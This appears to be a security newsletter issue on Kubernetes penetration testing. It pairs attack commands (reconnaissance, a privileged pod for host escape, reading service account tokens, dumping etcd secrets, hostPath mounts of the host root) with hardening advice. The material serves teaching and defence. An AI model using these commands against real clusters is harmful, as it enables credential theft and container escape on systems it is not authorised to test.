Securing a Kubernetes cluster requires an understanding of potential attack vectors and vulnerabilities. In this issue, we dive into Kubernetes penetration testing—covering hands-on attack scenarios and best practices to defend your cluster.

1. Setting Up the Test Environment

To practice penetration testing in a safe and controlled environment, you can set up a vulnerable Kubernetes cluster using:

• Kubernetes Goat – An intentionally vulnerable cluster with various security flaws.

• kind or minikube – Local Kubernetes environments to simulate real-world attacks.

• Misconfigured Helm charts – Deploying applications with insecure settings for testing.

2. Hands-on Attack Scenarios

Now, let's explore real-world attack scenarios that demonstrate common Kubernetes security flaws.

🔍 Scanning & Reconnaissance

• Run kube-hunter to scan for vulnerabilities in the cluster.

kube-hunter --remote <k8s-api-server-ip>

• Use kubectl-who-can to check who has access to sensitive resources:

kubectl who-can get pods -A

• Identify exposed Kubernetes API servers with misconfigured authentication:

curl -k https://<k8s-api-server>:6443/api/v1/namespaces/default/pods

⚡ Exploiting Misconfigurations

• Test for anonymous API access

kubectl get pods --server=https://<target>

• Exploit overly permissive RBAC roles by escalating privileges.

• Deploy a pod with privileged mode and attempt a host escape:

apiVersion: v1
kind: Pod
metadata:
  name: privileged-pod
spec:
  containers:
  - name: exploit
    image: alpine
    command: ["/bin/sh"]
    securityContext:
      privileged: true

kubectl exec -it privileged-pod -- sh

🔑 Stealing Secrets & Service Account Tokens

• Access service account tokens stored inside a pod:

cat /var/run/secrets/kubernetes.io/serviceaccount/token

• Extract etcd database contents, which store Kubernetes secrets:

ETCDCTL_API=3 etcdctl get --prefix /registry

🚀 Container Escape & Lateral Movement

• Exploit hostPath volume mounts to access the host filesystem:

volumes:
  - name: host-root
    hostPath:
      path: /

• Check if CAP_SYS_ADMIN is enabled and attempt privilege escalation.

• Deploy a malicious container and pivot to other nodes.

3. Best Practices for Securing Kubernetes

Now that we’ve seen how attacks happen, let’s look at how to secure your cluster:

✅ Apply Strong RBAC Policies

• Grant least privilege access to users and service accounts.

• Prevent anonymous API access.

✅ Restrict Privileged Containers & HostPath Access

• Use PodSecurityPolicy (PSP) or Pod Security Standards (PSS).

• Deny privileged containers unless explicitly required.

✅ Enable Kubernetes Audit Logging & Monitoring

• Continuously monitor API activity and user actions.

• Use Falco, Kubernetes Audit Logs, and Dynatrace for security monitoring.

✅ Implement Network Policies

• Restrict pod-to-pod communication using Network Policies.

• Prevent lateral movement by attackers within the cluster.

✅ Secure Secrets Management

• Store secrets securely using Vault or KMS instead of ConfigMaps.

• Rotate credentials and use short-lived access tokens.

✅ Regularly Scan for Vulnerabilities

• Run kube-bench to check CIS benchmark compliance:

kube-bench --version 1.6

• Use kube-hunter to scan for security issues.

• Patch vulnerabilities and update Kubernetes components regularly.

Final Thoughts

Kubernetes security is an ongoing process, and penetration testing is a crucial part of identifying and mitigating risks. By practicing these attack scenarios and implementing the best practices, you can harden your Kubernetes clusters against real-world threats.

🛡️ Want to learn more? Stay tuned for our next newsletter on advanced Kubernetes security hardening techniques.

🚀 Stay Secure & Keep Learning!